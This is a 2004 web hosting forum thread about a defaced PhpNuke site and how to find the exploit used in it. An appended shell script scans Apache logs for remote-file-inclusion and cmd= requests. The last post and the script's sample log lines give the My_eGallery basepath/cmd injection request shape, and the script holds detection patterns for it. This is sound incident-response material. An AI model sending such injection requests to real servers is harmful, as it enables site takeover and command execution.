Web Hosting Talk







Defacement


dlc2000
03-11-2004, 06:07 AM
Hello,

I have a site on my server that uses PhpNuke and the site was defaced today. Now I want to know if I should also worry about my server and all the sites on the box. I think that they used a PhpNuke hole. How can I check which exploit they used?

I have tried to find something for wget cp

for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done;

but I can't find anything

rsferreira
03-11-2004, 08:33 AM
Originally posted by dlc2000
Hello,

I have a site on my server that uses PhpNuke and the site was defaced today. Now I want to know if I should also worry about my server and all the sites on the box. I think that they used a PhpNuke hole. How can I check which exploit they used?

I have tried to find something for wget cp

for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done;

but I can't find anything

Instead of searching for 'wget', start searching for part of the text used in the deface. After finding the command/IP used, continue searching and you may find out who did it (might have been one of your users).

dlc2000
03-11-2004, 09:10 AM
OK, thank you, I have found his hack... it's a PHP script that places a layer over the home page and uses a Nuke bug!!

damainman
03-11-2004, 10:54 AM
Mind posting how you found it ;)?

Steven
03-11-2004, 10:58 AM
Was it this one?

/modules/My_eGallery/public/displayCategory.php?basepath= INJECT PATH ?&cmd= Command to run
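
The log search discussed in this thread, turned into a check for the request shape quoted in the last post; this is an added example, not code posted by anyone in the thread. It assumes Apache common/combined log format; the function names are hypothetical and the sample log lines (documentation IPs, .invalid/.test hosts) are constructed.

```shell
#!/bin/sh
# Added example: flag access-log requests where a query parameter's value is
# itself a URL (remote file inclusion indicator) or where a cmd= parameter is sent.
# The patterns are anchored to the request field so URLs in the Referer field do not match.

# Parameter value starting with a URL scheme, plain or percent-encoded "://".
RFI_RE='"(GET|POST|HEAD) [^" ]*[?&][A-Za-z0-9_]+=(https?|ftp)(://|%3a%2f%2f)'
# A cmd= parameter inside the requested URL.
CMD_RE='"(GET|POST|HEAD) [^" ]*[?&]cmd='

# scan_domlogs DIR: print "file:logline" for every suspicious request under DIR.
scan_domlogs() {
    grep -rHiE -e "$RFI_RE" -e "$CMD_RE" "$1" 2>/dev/null
}

# summarize_clients DIR: suspicious request count per client IP (first log field).
summarize_clients() {
    grep -rhiE -e "$RFI_RE" -e "$CMD_RE" "$1" 2>/dev/null |
        awk '{print $1}' | sort | uniq -c | sort -rn
}

# make_sample_logs: write constructed log lines to a temp dir and print its path.
make_sample_logs() {
    d=$(mktemp -d) || return 1
    cat > "$d/example.test" <<'EOF'
192.0.2.10 - - [11/Mar/2004:05:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [11/Mar/2004:05:02:10 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://remote.invalid/inc?&cmd=PLACEHOLDER HTTP/1.0" 200 312
198.51.100.7 - - [11/Mar/2004:05:02:40 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fremote.invalid/inc HTTP/1.0" 200 298
192.0.2.10 - - [11/Mar/2004:05:03:00 +0000] "GET /modules.php?name=News&file=article HTTP/1.1" 200 8411 "http://portal.example.test/go?url=http://www.example.test/" "Mozilla/4.0"
EOF
    echo "$d"
}

# Demo on the constructed logs; on a real server pass the domlogs directory instead.
demo=$(make_sample_logs) && {
    scan_domlogs "$demo"
    summarize_clients "$demo"
    rm -rf "$demo"
}
```

A 200 response to a flagged request is the cue to check what that client requested next and which files under the site changed around the same timestamp.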